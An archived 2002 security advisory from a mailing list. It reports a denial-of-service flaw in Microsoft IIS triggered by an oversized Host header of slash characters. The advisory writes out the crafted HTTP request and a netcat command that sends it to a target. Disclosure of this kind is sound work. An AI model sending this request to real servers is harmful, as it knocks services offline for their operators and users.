[NT] Malformed HOST Header Causes IIS DoS

From: support@securiteam.com
Date: 10/15/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 15 Oct 2002 04:19:43 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Malformed HOST Header Causes IIS DoS
------------------------------------------------------------------------

SUMMARY

A security vulnerability in IIS's web server allows remote attackers to
cause the web server to crash, this is done by providing it with a long
Host field filled with the character "/".

DETAILS

Exploit:
By either doinging it manually:

-------------------------[begin]--------------------------------------
POST /_vti_bin/shtml.dll HTTP/1.0
Host: [32762 '/' characters]
Content-length: 22

http://www.rapid7.com/
- --------------------------[end]---------------------------------------

This will cause the web service to consume 99% of the CPU for about 35
seconds. During this time, no other HTTP requests will be serviced. Use
it with:
$ nc x.x.x.x 80 < iis_dos

Or by using SPIKE:
See <http://www.immunitysec.com/spike.html>
http://www.immunitysec.com/spike.html for more details.

ADDITIONAL INFORMATION

The information has been provided by <mailto:Joe_Testa@rapid7.com> Joe
Testa and <mailto:dave@immunitysec.com> Dave Aitel (finder of the
problem).

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • Re: WSE 3.0, usernameOverTransportSecurity, custom Token Manager w/ securityTokenManager,
    ... I've added the web service call directly to my Data binding method ... expected but not present in the security header of the incoming ... the username token to the message. ... protected override string AuthenticateToken(UsernameToken token) ...
    (microsoft.public.dotnet.framework.webservices.enhancements)
  • Re: Cannot read a Security Log from ASP.net web service
    ... it's a very bad idea to grant that permission to the ASPNET ... Here's the error I get after adding the ASPNET account to the Admin group: ... Cannot open log Security on machine .. ... > a web form that calls a web service. ...
    (microsoft.public.dotnet.framework.aspnet.security)
  • RE: Recommendations for securing a local webservice.
    ... You seem to be trying to secure a web service interface to only those ... protocol that was intended to be caller agnostic to implement a caller ... Install a special certificate as part of the ... Combine #2 with token based security. ...
    (microsoft.public.dotnet.framework.aspnet.webservices)
  • RE: Web Service Implementation Security Question
    ... As for the security problems regarding on using TypedDAtaset in asp.net ... Web Service Implementation Security Question ... | enable the %windir%\Temp directory so the schema can compile. ... Have the process that “compiles�the schema files use another ...
    (microsoft.public.inetserver.iis.security)
  • RE: WSE 2.0, smart client, Username authentication, no x.509
    ... web services WSE 3.0 hosts them without a web server for you (read the WSE ... To perform authentication, because your database does not contain user ... the implementation William Stacey has uses Security ... > server where my web service is ...
    (microsoft.public.dotnet.framework.webservices.enhancements)